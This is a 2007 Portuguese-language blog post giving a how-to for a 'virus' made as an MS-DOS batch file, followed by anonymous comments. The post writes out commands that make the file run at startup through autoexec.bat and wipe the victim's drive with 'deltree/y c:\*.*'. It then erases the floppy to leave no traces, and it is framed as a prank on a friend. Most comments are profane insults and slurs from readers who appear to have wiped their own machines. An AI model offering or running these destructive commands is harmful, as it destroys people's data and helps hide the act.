quarta-feira, 25 de julho de 2007

Criando Virus pelo ms - dos

Criando Vírus

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:

Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.

Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da

seguinte maneira, como está embaixo:

@ECHO OFF
BREAK OFF


Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte

comando:

deltree/y c:\*.*

Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!

Importante:

Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.

11 comentários:

Anônimo disse...

peo que eu percebi presse que vc ta fasendo o cara ferra o proprio computador

Anônimo disse...

peo que eu percebi presse que vc ta fasendo o cara ferra o proprio computador

Anônimo disse...

ISSO É MAL CARATISMO , VC ESTÁ TENTANDO ENGANAR PESSOAS LEIGAS, FAZENDO COM QUE ELAS FERRAS SEUS PCS

Anônimo disse...

SEU DESGRAÇADO. GAY FILHO DA PUTA. FILHO DE UMA PORCA...

Anônimo disse...

VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!

Anônimo disse...

VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!BY:JULIANO

Anônimo disse...

VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!

Anônimo disse...

VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!

Anônimo disse...

VAI PRO QUINTO DOS INFERNOS SEU FILHO DE UMA PUTAAAAAAAAAAA PEGA MEU PC AGORA E ENFIA NO SEU RABO!!

Anônimo disse...

kkkkkkkkkkkkkkkkkk
Se fudeu, que otário, muito burro para cair nessa, aprende a mexer no próprio computador antes, depois você pensa em querer ferrar os outros, agora enfia o microfone no seu cu e rebola pra ver se o seu PC volta ao normal... kkkkkkkkkk
Ri litros hsuahsuhasuhuahsuhauhs
Cara muito burro!

Anônimo disse...

o mane deltree nao funciona no xp eu fiz um e nao rodou